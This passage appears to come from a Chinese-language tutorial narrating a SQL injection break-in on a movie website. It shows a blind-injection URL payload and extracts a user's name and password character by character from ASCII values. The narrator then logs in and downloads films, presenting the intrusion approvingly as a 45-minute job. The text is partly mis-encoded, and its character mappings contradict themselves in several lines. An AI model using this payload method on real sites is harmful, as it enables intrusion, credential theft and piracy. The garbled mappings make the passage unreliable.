http://www.movie.com/movie.ASP?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)

呵呵，又返回一部影片，搜索一下，影片ID為1104，即asc(mid(UserID,1,1))=104

同樣方法，得出：

asc(mid(UserID,2,1))=117

asc(mid(UserID,3,1))=97

asc(mid(UserID,4,1))=106

asc(mid(UserID,5,1))=105

asc(mid(UserID,6,1))=101

因?yàn)閘en(UserID)=6，所以算到第6位就行了，查asc對(duì)應(yīng)表（會(huì)編程的可以寫(xiě)幾句話算出來(lái)），chr(104)=h，chr(117)=u，chr(97)=a，chr(106)=j，chr(105)=i，chr(101)=e

連起來(lái)，用戶名就是huajie

8.同樣的方法破解密碼

asc(mid(Password,1,1))=49 => chr(49)=1

asc(mid(Password,2,1))=57 => chr(49)=9

asc(mid(Password,3,1))=55 => chr(49)=7

asc(mid(Password,4,1))=56 => chr(49)=8

asc(mid(Password,5,1))=48 => chr(49)=0

asc(mid(Password,6,1))=55 => chr(49)=7

asc(mid(Password,7,1))=55 => chr(49)=1

asc(mid(Password,8,1))=55 => chr(49)=2

拼起來(lái)：19780712，哈哈，又是用生日做密碼的！

接下來(lái)，輸入用戶名和密碼，登錄系統(tǒng)，成功！猜表名列表之前用了30分鐘，破解用了15分鐘，45分鐘搞掂了一個(gè)站。接下來(lái)做什么？當(dāng)然是先Down幾G的電影下來(lái)再說(shuō)了。

上述的相關(guān)內(nèi)容就是對(duì)SQL注入網(wǎng)站入侵實(shí)例的描述，希望會(huì)給你帶來(lái)一些幫助在此方面。